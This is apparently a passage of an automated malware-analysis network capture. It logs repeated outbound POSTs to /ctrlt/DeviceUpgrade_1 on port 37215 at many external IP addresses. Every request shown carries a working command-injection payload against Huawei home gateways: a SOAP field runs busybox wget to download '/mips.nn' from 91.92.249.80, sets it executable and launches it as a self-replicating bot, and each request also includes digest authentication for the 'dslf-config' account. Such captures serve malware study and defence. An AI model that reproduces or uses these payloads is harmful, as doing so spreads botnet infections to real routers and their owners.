                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          772192.168.2.2345582157.119.135.25037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232681990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          773192.168.2.2343924157.181.52.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232742071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          774192.168.2.2334456157.231.254.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232769966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          775192.168.2.2356088197.132.199.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232829094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          776192.168.2.2357094157.248.102.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232829094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          777192.168.2.235124841.53.37.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232866049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          778192.168.2.234387841.105.182.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232902050 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          779192.168.2.2334630157.122.36.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232919931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          780192.168.2.2354026157.155.206.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232969999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          781192.168.2.2347552192.5.137.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233006001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          782192.168.2.234921641.120.164.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.233047962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
